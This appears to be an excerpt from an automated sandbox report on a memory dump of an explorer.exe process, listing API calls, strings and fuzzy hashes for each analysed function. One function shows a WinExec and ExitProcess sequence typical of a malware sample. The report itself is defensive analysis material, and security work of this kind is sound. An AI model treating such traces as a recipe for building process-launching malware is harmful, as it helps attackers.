                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                      • API String ID: 2332921423-393685449
                                                                                                                                                      • Opcode ID: 1f106178b614d6a0cf22ee881d0b1307683b99bd44ad240fdac2f9e2c594b201
                                                                                                                                                      • Instruction ID: 14d2a56ce02457a9e7a49ce17c3faf174886295b082585420fd82c42e264ba34
                                                                                                                                                      • Opcode Fuzzy Hash: 1f106178b614d6a0cf22ee881d0b1307683b99bd44ad240fdac2f9e2c594b201
                                                                                                                                                      • Instruction Fuzzy Hash: 51B17E71C00219EFCF24DF98C881A9EBBB5FF14314B14426BE916AB312D771DA51EB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 008B82E0
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 008B82E6
                                                                                                                                                      • GetFileSizeEx.KERNEL32(?), ref: 008B8342
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 008B8362
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 008B836F
                                                                                                                                                      • WinExec.KERNEL32(?,00000000), ref: 008B83CF
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 008B83D6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileHandleModuleProcess$CloseCurrentExecExitNameSize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 515874469-0
                                                                                                                                                      • Opcode ID: 448ee22351c78928958040d6c6f1c577307b8dd273b58825418d84c5d2151dea
                                                                                                                                                      • Instruction ID: 445aed71f55673dbfbe60615886ac74fc74dcc0a28c80c37db51786231602ab1
                                                                                                                                                      • Opcode Fuzzy Hash: 448ee22351c78928958040d6c6f1c577307b8dd273b58825418d84c5d2151dea
                                                                                                                                                      • Instruction Fuzzy Hash: E831B275A08740EBC6209F69CC84AAF7AB8FF89720F104A1AF595C7350CB34D856CB63
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ea070f61bda175a61e7075ecf58e85dec5ea7faa299c1d5795bd9c670c2c0262
                                                                                                                                                      • Instruction ID: 58a98bd71765337cece8f1d29ce9e958d3780b015e23e4ce8c982090584b61c6
                                                                                                                                                      • Opcode Fuzzy Hash: ea070f61bda175a61e7075ecf58e85dec5ea7faa299c1d5795bd9c670c2c0262
                                                                                                                                                      • Instruction Fuzzy Hash: F5B17970A04249EFDB11DBA9C881BADBBB2FF59314F14425AE401EB392DBB19D41CF61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,008D2B3B,008C1966,008C14B7), ref: 008D2B52
                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008D2B60
                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008D2B79
                                                                                                                                                      • SetLastError.KERNEL32(00000000,008D2B3B,008C1966,008C14B7), ref: 008D2BCB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                      • Opcode ID: 07828f45dd96bf31584a68d9eff03260a3eddd92d1517342cb4d146b9f11aef8
                                                                                                                                                      • Instruction ID: 464fae0a5370254a3295298b67f2b364ed70c1813a7fcd8d1a1de2c96839fb40
                                                                                                                                                      • Opcode Fuzzy Hash: 07828f45dd96bf31584a68d9eff03260a3eddd92d1517342cb4d146b9f11aef8
                                                                                                                                                      • Instruction Fuzzy Hash: 4A01D832209217EE96253E78ADC6A273F55FB61374720033BFA14C92F2EE914C029251
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,D95F0960,D95F0960,00000000,00000000), ref: 008A95A0
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 008A96DB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                      • String ID: @iN$@iN$@iN
                                                                                                                                                      • API String ID: 626452242-3936761298
                                                                                                                                                      • Opcode ID: e1dc083a2a8afc70d86aed1dc96bf1fa9fac13268be38d470696d5295f169777
                                                                                                                                                      • Instruction ID: bc5c3bda0787b85064a490c281fa84ecd76848a208e9bd4333ebbec86b7349ed
                                                                                                                                                      • Opcode Fuzzy Hash: e1dc083a2a8afc70d86aed1dc96bf1fa9fac13268be38d470696d5295f169777
                                                                                                                                                      • Instruction Fuzzy Hash: 57513B3160E2455BFB389D2C9C4953EB9A4FBDB314F258A2AF1C5CAAA1E620CC40C757
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetFileType.KERNEL32(008CDAA2,?,00000000,?), ref: 008CDB29
                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(008CDAA2,?), ref: 008CDB83
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,008CDAA2,?,000000FF,00000000), ref: 008CDC11
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 008CDC18
                                                                                                                                                      • PeekNamedPipe.KERNEL32(008CDAA2,00000000,00000000,00000000,?,00000000), ref: 008CDC55
                                                                                                                                                        • Part of subcall function 008CD844: __dosmaperr.LIBCMT ref: 008CD879
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1206951868-0
                                                                                                                                                      • Opcode ID: e075eb48b153d2c375fc55ee12daa1720f5a7c73df8d041aa31b5764e9012c37
                                                                                                                                                      • Instruction ID: 1f9d69ad32c701ed97d60d8d79cba498df1d3dc6d23451733fc1e14b2f78e89d
                                                                                                                                                      • Opcode Fuzzy Hash: e075eb48b153d2c375fc55ee12daa1720f5a7c73df8d041aa31b5764e9012c37
                                                                                                                                                      • Instruction Fuzzy Hash: 9A412A75900744ABDB24EFA9D885EABBBF9FF88300B00852EF856D3611E730E841CB11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID: [&T!$\&T!$\&T!
                                                                                                                                                      • API String ID: 4218353326-1060882007
                                                                                                                                                      • Opcode ID: a5b83fd0c896d967ea752b9570a760f06492e5dc9dfc2744106127dc97ce9421
                                                                                                                                                      • Instruction ID: f12daa5a9fb5478d15c835d482dfa67ecd219160cb251ee6a53208a1ed48ab16
                                                                                                                                                      • Opcode Fuzzy Hash: a5b83fd0c896d967ea752b9570a760f06492e5dc9dfc2744106127dc97ce9421
                                                                                                                                                      • Instruction Fuzzy Hash: CB8168B1D0021E8FCF248FE889815FEBAB4FB19304F644A57E425F6360D3759A408BA6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 008DFB09
                                                                                                                                                      • CatchIt.LIBVCRUNTIME ref: 008DFBEF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CatchEncodePointer
                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                      • API String ID: 1435073870-2084237596
                                                                                                                                                      • Opcode ID: e2d6e4332fa07428ad682a722fde1d5278ae85ba108fb25da1136fbff3563ab8
                                                                                                                                                      • Instruction ID: 7cf1eb941f9ba3cb8548407c8b06eb3ab171a550e5cb190efb830bf3991ce2ff
                                                                                                                                                      • Opcode Fuzzy Hash: e2d6e4332fa07428ad682a722fde1d5278ae85ba108fb25da1136fbff3563ab8
                                                                                                                                                      • Instruction Fuzzy Hash: 64416A71900209EFCF15DF98CD81AEEBBB5FF48314F14826AFA06A7212D3359961EB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(008EF120,00000000,00000000,008CDDF4), ref: 008D6B1D
                                                                                                                                                        • Part of subcall function 008D9383: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,008DD3BE,?,00000000,-00000008), ref: 008D942F
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008D6D78
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008D6DC0
                                                                                                                                                      • GetLastError.KERNEL32 ref: 008D6E63
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                                      • Opcode ID: 82ff7b7bb2db91178e250a2cb87ce26dd33b2c0cd62ef9042f088efd6f1cf2f4
                                                                                                                                                      • Instruction ID: 0e553845dbd3318379c43848164c127e61fc1bde4ffe3fa22c5c3b2779bd4964
                                                                                                                                                      • Opcode Fuzzy Hash: 82ff7b7bb2db91178e250a2cb87ce26dd33b2c0cd62ef9042f088efd6f1cf2f4
                                                                                                                                                      • Instruction Fuzzy Hash: 54D15B75D0065C9FCB15CFE8D880AADBBB5FF48314F24462AE855EB352E730A952CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                      • Opcode ID: d4bb204e37aada1cbd6a5ff5237c4f31b23a5364e5f3ae6f7e6dece8fb5c7467
                                                                                                                                                      • Instruction ID: 6d21dc1e2a76e906e2e90c75ffdd08df35d62bd44522edf0054a4e51ed5fd8a5
                                                                                                                                                      • Opcode Fuzzy Hash: d4bb204e37aada1cbd6a5ff5237c4f31b23a5364e5f3ae6f7e6dece8fb5c7467
                                                                                                                                                      • Instruction Fuzzy Hash: 7451D172600606AFDB289F14E881B6A77B1FF00310F14423EEA16C7392E731ED91E795
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6d63f4a3817bf4d138576bcddf4632be08b193ef727270b8fe1c6bebcd923ffc
                                                                                                                                                      • Instruction ID: 0a276b41f1314b1ed0f08871f702c066fdfc9f573c7b7c6020673bdd945edea7
                                                                                                                                                      • Opcode Fuzzy Hash: 6d63f4a3817bf4d138576bcddf4632be08b193ef727270b8fe1c6bebcd923ffc
                                                                                                                                                      • Instruction Fuzzy Hash: 4341D872A00758BFD7249F7CD842F6ABBA8FB85720F10466BF196EB381D67199408781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,008D3392,?,000000FF,00893C1C,00000000,008ECE74,?,008D3146,00000021,008E8CEC,008E8CE4,008E8CEC,00893C1C), ref: 008D3346
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: 99d58f58debabe97653ad2c2e27a756315262282ce0c4196d50b5ed698c94c01
                                                                                                                                                      • Instruction ID: 12b5e253265f6165ef1b87dcce8cdf2b9f891ece2038f245356515726de198d1
                                                                                                                                                      • Opcode Fuzzy Hash: 99d58f58debabe97653ad2c2e27a756315262282ce0c4196d50b5ed698c94c01
                                                                                                                                                      • Instruction Fuzzy Hash: 4521D235E01211ABCB269B25FD85A5E3768FB41770F250222E806EB391DA70EE01CAD2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E1004,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000), ref: 008DBB05
                                                                                                                                                      • GetLastError.KERNEL32(?,008E1004,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 008DBB0F
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 008DBB16
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008E1004,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000), ref: 008DBB40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1391015842-0
                                                                                                                                                      • Opcode ID: 3b0ab1d5e396a79e2db2458913f0d63c3285a17f18ccaf1206f778fe7471782a
                                                                                                                                                      • Instruction ID: 7bc7f78816f07c4ab9156425bfea42845721455494e1d17421b7ee58684491f1
                                                                                                                                                      • Opcode Fuzzy Hash: 3b0ab1d5e396a79e2db2458913f0d63c3285a17f18ccaf1206f778fe7471782a
                                                                                                                                                      • Instruction Fuzzy Hash: 3DF08C32600200AFDB206FA6CC05E17BFA9FF44330711892AF55AC7224DB32E810CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E0F8C,00000000,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000), ref: 008DBB6B
                                                                                                                                                      • GetLastError.KERNEL32(?,008E0F8C,00000000,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008DBB75
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 008DBB7C
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008E0F8C,00000000,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000), ref: 008DBBA6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1391015842-0
                                                                                                                                                      • Opcode ID: 7e539bf77bcc48d6763bb8af1fad30a4ffe8a8ca9eb5433572e23445428596dc
                                                                                                                                                      • Instruction ID: c2b46d81d845c1b1eb3ff1baab37378ba8eef3d92579e58f3e33bc39d80822e1
                                                                                                                                                      • Opcode Fuzzy Hash: 7e539bf77bcc48d6763bb8af1fad30a4ffe8a8ca9eb5433572e23445428596dc
                                                                                                                                                      • Instruction Fuzzy Hash: B5F0AF36200200EFDB205FA6CC48E17BFA9FF44370712892BF556C6224DB32E811CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000), ref: 008E18FF
                                                                                                                                                      • GetLastError.KERNEL32(?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4,008CDDF4,?,008D6802,?), ref: 008E190B
                                                                                                                                                        • Part of subcall function 008E195C: CloseHandle.KERNEL32(008EFB60,008E191B,?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4,008CDDF4), ref: 008E196C
                                                                                                                                                      • ___initconout.LIBCMT ref: 008E191B
                                                                                                                                                        • Part of subcall function 008E193D: CreateFileW.KERNEL32(008EBD18,40000000,00000003,00000000,00000003,00000000,00000000,008E18D9,008DFC77,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4), ref: 008E1950
                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4), ref: 008E1930
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                      • Opcode ID: 089f46d1d188eb195e9f847c5b62752fd42ccfc5e2b744dc90c3d36d150d415b
                                                                                                                                                      • Instruction ID: 3a7e6d270940e83704f211cda3d94a783bc3bb1e6beece51bdb3dc3db4c06354
                                                                                                                                                      • Opcode Fuzzy Hash: 089f46d1d188eb195e9f847c5b62752fd42ccfc5e2b744dc90c3d36d150d415b
                                                                                                                                                      • Instruction Fuzzy Hash: 97F03736500199BBCF122F96DC59A8D3F26FF457A0B414010FE19D9131C6328820DB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 008C1B4F
                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 008C1C03
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                      • String ID: csm
                                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                                      • Opcode ID: 29bc7fae8d2b651264d872eeaee3cf58ad2d3b94740c98438e73abc423e0a70f
                                                                                                                                                      • Instruction ID: b4f55ac9d517c38c220504087ec9f216c41bc3e6d104491a8400287e890003e6
                                                                                                                                                      • Opcode Fuzzy Hash: 29bc7fae8d2b651264d872eeaee3cf58ad2d3b94740c98438e73abc423e0a70f
                                                                                                                                                      • Instruction Fuzzy Hash: AB419034A002089BCF10DF69C888A9EBBB5FF56324F148159E814DB393E731EE15CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 008DF5C6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___except_validate_context_record
                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                                                                      • Opcode ID: 7ea04603b2098351e45706ec9cf1a992e8463c5939a276686464ae7cb9b4b4f0
                                                                                                                                                      • Instruction ID: 65e90a7478cab2619dfcee689895c0c45c52704b106445bfaffbe948e5dd5379
                                                                                                                                                      • Opcode Fuzzy Hash: 7ea04603b2098351e45706ec9cf1a992e8463c5939a276686464ae7cb9b4b4f0
                                                                                                                                                      • Instruction Fuzzy Hash: AF31A132400218EBCF265F54E94496A7B65FF28315B18436BFE5A89732C332CD61EF81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%